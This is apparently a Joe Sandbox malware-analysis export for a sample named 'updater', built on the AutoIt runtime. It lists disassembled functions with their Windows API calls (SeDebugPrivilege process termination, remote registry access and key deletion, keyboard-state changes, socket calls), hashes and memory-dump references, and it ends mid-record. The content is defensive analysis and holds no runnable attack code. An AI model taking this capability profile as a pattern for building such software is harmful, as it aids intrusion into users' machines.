API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0dbbe6abc62d0026d5119440ab2811266f69dc7c4f16670964e9136239c7ccc4
Instruction ID: 3f9c014e3a0fc5497ac01afcb018316c55c9d900256ee7d1707110c9a75b2b09
Opcode Fuzzy Hash: 0dbbe6abc62d0026d5119440ab2811266f69dc7c4f16670964e9136239c7ccc4
Instruction Fuzzy Hash: 0641BC702003019FDB27EF24DC99FADB7A5AF85714F148069F8469F2D2CB74A844CB96

Function 003256F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00360C5B

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

_memset.LIBCMT ref: 00325787
_wcscpy.LIBCMT ref: 003257DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003257EB
__swprintf.LIBCMT ref: 00360CD1

Strings

AutoIt - , xrefs: 00325760
Line %d: , xrefs: 00360CCB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: eff695f3a43af185aa86d159b1344ecf2c0a22cb568108b6ae0df1c354c074d1
Instruction ID: 25a24e62cdf5a0ba55cd76ce85e4dabd96d35b2f70cc622dfbe24423d858a3ae
Opcode Fuzzy Hash: eff695f3a43af185aa86d159b1344ecf2c0a22cb568108b6ae0df1c354c074d1
Instruction Fuzzy Hash: 4741C571008314AAC327EB64ED86FEF77ECAF54350F004A1EF585960A2EB349648C796

Function 003747E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00374802
LoadStringW.USER32(00000000), ref: 00374809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037481F
LoadStringW.USER32(00000000), ref: 00374826
_wprintf.LIBCMT ref: 0037484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00374847

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: db8d7ae76cdee2d033a18a7300a488db6c55fbdf04982d80e6fb8c7b4526a200
Instruction ID: 5a778b5665db90fa8bd055500550556618822d6d98418881e82746855b79d2de
Opcode Fuzzy Hash: db8d7ae76cdee2d033a18a7300a488db6c55fbdf04982d80e6fb8c7b4526a200
Instruction Fuzzy Hash: E90162F694020C7FE7269BA09D89EF7776CE709300F404595B749E2051EB74AE844B75

Function 016D2CF1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,016D2DBB,?,?,?,?,?,?,?,016D2E67,016D19FC), ref: 016D2D2A
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,016D2DBB,?,?,?,?,?,?,?,016D2E67), ref: 016D2D30
GetStdHandle.KERNEL32(000000F5,016D2D79,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,016D2DBB), ref: 016D2D45
WriteFile.KERNEL32(00000000,000000F5,016D2D79,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,016D2DBB), ref: 016D2D4B
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 016D2D69

Strings

Error, xrefs: 016D2D5D
Runtime error at 00000000, xrefs: 016D2D23, 016D2D62

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 1d53984413e486109f70d7e4679bb31ca24ff0155247656400f8e98eea6def91
Instruction ID: 0cad530febf64284b2bd259fbeb2ca78c89cb93940082d9552101618ac59fd3b
Opcode Fuzzy Hash: 1d53984413e486109f70d7e4679bb31ca24ff0155247656400f8e98eea6def91
Instruction Fuzzy Hash: 03F0B472F8930539EB31AB689C5AFD926994B01F11F50830DF210AA0C9C7F084C4D325

Function 00390371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039044E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 87dbe57649d66cf4ab8be490a223deb4a85c015aa6a2f6c632b94bd33ffd5048
Instruction ID: 9219ff466e5946aa8d5d7527982ed30a232221490d0b9a657f5989053ba9b9b8
Opcode Fuzzy Hash: 87dbe57649d66cf4ab8be490a223deb4a85c015aa6a2f6c632b94bd33ffd5048
Instruction Fuzzy Hash: 09A18B702042019FCB1AEF64D881B6EB7F5EF85314F14891DF9969B2A2DB31E985CF42

Function 00312E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000024,?,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 00312E9F
ShowWindow.USER32(00000024,00000000,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000,000000FF), ref: 00312EE7
ShowWindow.USER32(00000024,00000006,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 0034C55B
ShowWindow.USER32(00000024,?,00000000,00000000,?,0034C508,00000004,00000000,00000000,00000000), ref: 0034C5C7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cfec5af409581446a593b34521f194d8740d975def31949d11acf10df3f49e2d
Instruction ID: 2b75ebb771969d5ca0f15b1dbe7f69e0b106364e30730ea6ed6eeaa820490fbc
Opcode Fuzzy Hash: cfec5af409581446a593b34521f194d8740d975def31949d11acf10df3f49e2d
Instruction Fuzzy Hash: DD41E9306156809ACB7F8B29DC887EB7BDAAB8A300F59444DF4474A960D771B9E0D730

Function 00377681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00377698

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003776CF
EnterCriticalSection.KERNEL32(?), ref: 003776EB
_memmove.LIBCMT ref: 00377739
_memmove.LIBCMT ref: 00377756
LeaveCriticalSection.KERNEL32(?), ref: 00377765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0037777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00377799

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: fe27df45caec04a6b5c87b573cf14f10b04b247ab4a12095b763d8d351599ff9
Instruction ID: b4996d70036713d2acd41f52b48335354927a5a27343aa6f06b3f3c71d912c0b
Opcode Fuzzy Hash: fe27df45caec04a6b5c87b573cf14f10b04b247ab4a12095b763d8d351599ff9
Instruction Fuzzy Hash: E5318D76904205EBCB16EFA4DC85EAEB7B8EF45300F1480A5F904AF256DB34DE54DBA0

Function 003967F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00396810
GetDC.USER32(00000000), ref: 00396818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00396823
ReleaseDC.USER32(00000000,00000000), ref: 0039682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0039686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0039687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0039964F,?,?,000000FF,00000000,?,000000FF,?), ref: 003968B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003968D6

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 84efbba690ffc67e75b7dbe07c47460a726dc2d06fba9b0c14fb823d38a903e4
Instruction ID: 2000845ad6b2a890f63c31d788f5f612dd0ca94b21f74fceb6298e2a6127f4cd
Opcode Fuzzy Hash: 84efbba690ffc67e75b7dbe07c47460a726dc2d06fba9b0c14fb823d38a903e4
Instruction Fuzzy Hash: E6316B72101214BFEF168F10CC8AFEB3BADEB4A765F054065FE089A292D7759851CBB0

Function 0036C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0036C75D
_memcmp.LIBCMT ref: 0036C77F
_memcmp.LIBCMT ref: 0036C797
_memcmp.LIBCMT ref: 0036C7AA
_memcmp.LIBCMT ref: 0036C7C4
_memcmp.LIBCMT ref: 0036C7D7
_memcmp.LIBCMT ref: 0036C7EF
_memcmp.LIBCMT ref: 0036C80A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9dd77ff94014042f4a0aa7ba03dae14f505fb63ef56b0f7c2e2bbb8ebe712cdf
Instruction ID: 7f0ce3362819e8c61a0faea084f86ffd34ef4e9913d7a6b5a3ba5dcc6c135503
Opcode Fuzzy Hash: 9dd77ff94014042f4a0aa7ba03dae14f505fb63ef56b0f7c2e2bbb8ebe712cdf
Instruction Fuzzy Hash: 2921D1727212057FD61776628D83FBB376CDE26794F08D020FD46AB64AE710DE21CAA1

Function 0037F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

_wcstok.LIBCMT ref: 0037F2D7
_wcscpy.LIBCMT ref: 0037F366
_memset.LIBCMT ref: 0037F399

Strings

X, xrefs: 0037F3D6

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 807c5c6492fc812d0d34721c80fb256d733328dddb9c971e64448d7660445b08
Instruction ID: 2cd21bc2895648a12b1465cdfbfdb4530ba1826b7cc527ac8f2a5cd5a8be797e
Opcode Fuzzy Hash: 807c5c6492fc812d0d34721c80fb256d733328dddb9c971e64448d7660445b08
Instruction Fuzzy Hash: B0C19075504750DFC726EF24D981A5BB7E4BF89310F00892DF8998B2A2DB30ED45CB82

Function 003871EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 003872EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0038730C
WSAGetLastError.WSOCK32(00000000), ref: 0038731F
htons.WSOCK32(?), ref: 003873D5
inet_ntoa.WSOCK32(?), ref: 00387392

Part of subcall function 0036B4EA: _strlen.LIBCMT ref: 0036B4F4
Part of subcall function 0036B4EA: _memmove.LIBCMT ref: 0036B516

_strlen.LIBCMT ref: 0038742F
_memmove.LIBCMT ref: 00387498

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: ce96b73bec65734741af7f8103284cbb8ba978b080b5041017accf6ee86fb857
Instruction ID: 08fc3e544e8206ddf619a60791adc1d6a456bbc6f1abc980968e3f90a27aebbf
Opcode Fuzzy Hash: ce96b73bec65734741af7f8103284cbb8ba978b080b5041017accf6ee86fb857
Instruction Fuzzy Hash: AD81D271108300ABC316FB65DC85F6BB7A9EF88714F20895CF5559B292EB70DD41CB91

Function 00311800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f316fa56a6c356ebe1f6eba1fbf627bc488b03ac01045a3f280952bc1fb51f8
Instruction ID: 8d45b7075d61575a3e3480a18f1c4a5e523c358c76a13f28fd476142d2801249
Opcode Fuzzy Hash: 2f316fa56a6c356ebe1f6eba1fbf627bc488b03ac01045a3f280952bc1fb51f8
Instruction Fuzzy Hash: 5B715F30900109EFDB0ACF54CC45AEEBB79FF8A314F148159F915AA251C770AA51CB60

Function 0039B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01546548), ref: 0039BA5D
IsWindowEnabled.USER32(01546548), ref: 0039BA69
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0039BB4D
SendMessageW.USER32(01546548,000000B0,?,?), ref: 0039BB84
IsDlgButtonChecked.USER32(?,?), ref: 0039BBC1
GetWindowLongW.USER32(01546548,000000EC), ref: 0039BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0039BBFB

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: ad151c1e7fa7c3b0be436ddbff3f2e26c02973b33478923d3591ce6b1ec2694b
Instruction ID: 2fea52926ded98c6f5b8e495461e49f120b2204d21b127c4f60b144c76f8a63a
Opcode Fuzzy Hash: ad151c1e7fa7c3b0be436ddbff3f2e26c02973b33478923d3591ce6b1ec2694b
Instruction Fuzzy Hash: B171DD34604204AFDF279F54EAD4FBAFBB9EF4A300F054059E985972A1C731AD50DB60

Function 0037174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0037178B
GetKeyboardState.USER32(?), ref: 003717A0
SetKeyboardState.USER32(?), ref: 00371801
PostMessageW.USER32(?,00000101,00000010,?), ref: 0037182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 0037184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00371894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003718B7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8856287208f2a412002d18cd95d0e5d3c6db78574cafa594146d0208d7608a2a
Instruction ID: d2d8f9ccc9a7f155dee5c4db1b382fa90f5408b3510e8e55c916d87783548055
Opcode Fuzzy Hash: 8856287208f2a412002d18cd95d0e5d3c6db78574cafa594146d0208d7608a2a
Instruction Fuzzy Hash: B851D362A087D53DFB37463CC855BBA7EE95B06300F09C589E1DD598D2C29CDC84D751

Function 00371565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003715A4
GetKeyboardState.USER32(?), ref: 003715B9
SetKeyboardState.USER32(?), ref: 0037161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00371646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00371663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003716A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003716C8

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e70ec5a880aa20efb8c9a9f4b1d2575b8a11c5903f2dca925c4ccc06a8326076
Instruction ID: 63f5d880791bc83865e34580486190d97e8fc20c3a4f0e920f0f4b47ec9d582f
Opcode Fuzzy Hash: e70ec5a880aa20efb8c9a9f4b1d2575b8a11c5903f2dca925c4ccc06a8326076
Instruction Fuzzy Hash: F451D5A26047D53DFB37872C8C45BBABEE95B06300F0CC589E5DD5A8C2D698AC98E750

Function 003978B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003978CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397976
IsMenu.USER32(?), ref: 0039798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003979D6
DrawMenuBar.USER32 ref: 003979E9

Strings

0, xrefs: 003978C3

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1fee37d45eff9699fbf450e33061575bcf3d78752f02630d853f2a5f81f1971b
Instruction ID: 3326edf9ac8eeee6d82d5887beb843f162632f8dba5559e8f7b6b475f63485f2
Opcode Fuzzy Hash: 1fee37d45eff9699fbf450e33061575bcf3d78752f02630d853f2a5f81f1971b
Instruction Fuzzy Hash: 77415B75A18209EFDF12DF54D884EAABBF9FF0A310F058129E9559B290D734AD50CFA0

Function 00391602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00391631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039165B
FreeLibrary.KERNEL32(00000000), ref: 00391712

Part of subcall function 00391602: RegCloseKey.ADVAPI32(?), ref: 00391678
Part of subcall function 00391602: FreeLibrary.KERNEL32(?), ref: 003916CA
Part of subcall function 00391602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003916ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 003916B5

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 1c2a652fe739ee67b702828279979194adccb58731b89fd0a7c9c594250604b8
Instruction ID: c54fae1c9a7d3eea77453c822384bae8b37d9846b89e56217cbd1c9d853d89c9
Opcode Fuzzy Hash: 1c2a652fe739ee67b702828279979194adccb58731b89fd0a7c9c594250604b8
Instruction Fuzzy Hash: 46310AB590110ABFDF16DB90DC89AFFB7BCEF09341F04016AE916A2150EA749E459AA0

Function 003968F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00396911
GetWindowLongW.USER32(01546548,000000F0), ref: 00396944
GetWindowLongW.USER32(01546548,000000F0), ref: 00396979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003969AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003969D5
GetWindowLongW.USER32(00000000,000000F0), ref: 003969E6
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00396A00

Memory Dump Source

